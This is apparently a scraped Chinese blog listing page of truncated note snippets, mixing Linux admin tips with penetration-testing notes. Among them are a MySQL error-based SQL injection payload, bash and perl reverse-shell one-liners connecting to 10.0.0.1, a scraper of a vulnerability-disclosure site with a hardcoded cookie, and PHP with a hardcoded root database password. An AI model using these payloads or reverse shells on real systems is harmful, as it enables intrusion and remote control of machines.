to8to-bruce
- 浏览: 7124 次
-
最新评论
文章列表
import urllib2
import math
for line in open('d.html'):
req = urllib2.Request('http://www.wooyun.org'+line.strip())
cookie='share_firstime=1423041834739; ';
req.add_header('Cookie', cookie)
resp = urllib2.urlopen(req)
f=open('wooyun'+line.strip()+'.html','w')
f.write(r ...
page=4%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1);%23
压缩文件
tar czvf my.tar.gz dir1 dir2
分割
split -b 100m(k) filename outfilenmae
cat filename1,fi...>my.tar
http://www.ip2location.com/free/visitor-blocker
Debian or Ubuntu: sudo apt-get install build-essential cmake libgmp3-dev libpcap-dev gengetopt byacc flex
Red Hat Enterprise Linux or CentOS: sudo yum install cmake gmp gmp-devel libpcap-devel gengetopt byacc flex
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
void error(char *msg)
{
perror(msg);
exit(0
#!/usr/bin/perl
$auth_enabled = 0; $auth_login = "hidden"; $auth_pass = "hidden";
<?php
//连接数据库部分,注意使用了gbk编码
$conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!');
mysql_query("SET NAMES 'gbk'");
mysql_select_db('test', $conn) OR emMsg("连接数据库失败,未找到您填写的数据库");
mysql的一个bug http://bugs.mysql.com/bug.php?id=8652
重现过程
use mysql;
create table r1 (a int); insert into r1 values (1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2);
select left(rand(),3),a from r1 group by 1;
wget http://am1.php.net/distributions/php-5.3.28.tar.gz
tar zxvf php-5.3.28.tar.gz
cd php-5.3.28
cd ext
./ext_skel --extname=shell
cd shell
vi config.m4
wget -c http://soft.vpser.net/lnmp/lnmp1.0-full.tar.gz && tar zxvf lnmp1.0-full.tar.gz && cd lnmp1.0-full当然上面的soft.vpser.net也可以替换为离你近的镜像节点。
下面以主镜像替换为soft2镜像为例如果是centos的系统,再执行:sed -i 's/soft.vpser.net/soft2.vpser.net/g' centos.sh然后再安装:./centos.sh
如果是debian的系统,再执行:sed -i 's/soft.vpse ...
Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
PERL
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,get ...
Ctrl + a 切换到命令行开始
Ctrl + e 切换到命令行末尾
Ctrl + l 清除屏幕内容,效果等同于clear
Ctrl + u 清除剪切光标之前的内容
Ctrl + k 剪切清除光标之后的内容
Ctrl + y 粘贴刚才所删除的字符
Ctrl + r 在历史命令中查找
Ctrl + c 终止命令
Ctrl + d 退出shell,logout
Ctrl + z 转入后台运行
!! 重复执行最后一条命令
↑(Ctrl+p) 显示上一条命令
↓(Ctrl+n) 显示下一条命令
!$ 显示系统最近的一条参数
service nscd stop
#!/bin/bash
a=`date +%F-%H-%M`;
while read LINE;
do
sed -i "1s/^.*$/$LINE/" /etc/hosts;
mkdir /home/webscan/logs/$a;
wget www.xxx.com -O /home/webscan/logs/$a/$LINE.html;
done < /home/webscan/hosts
b=`grep 'xxxxx' /home/webscan/logs/$a/*|wc -l` ...
find . -name "*.php" | xargs grep -n "include"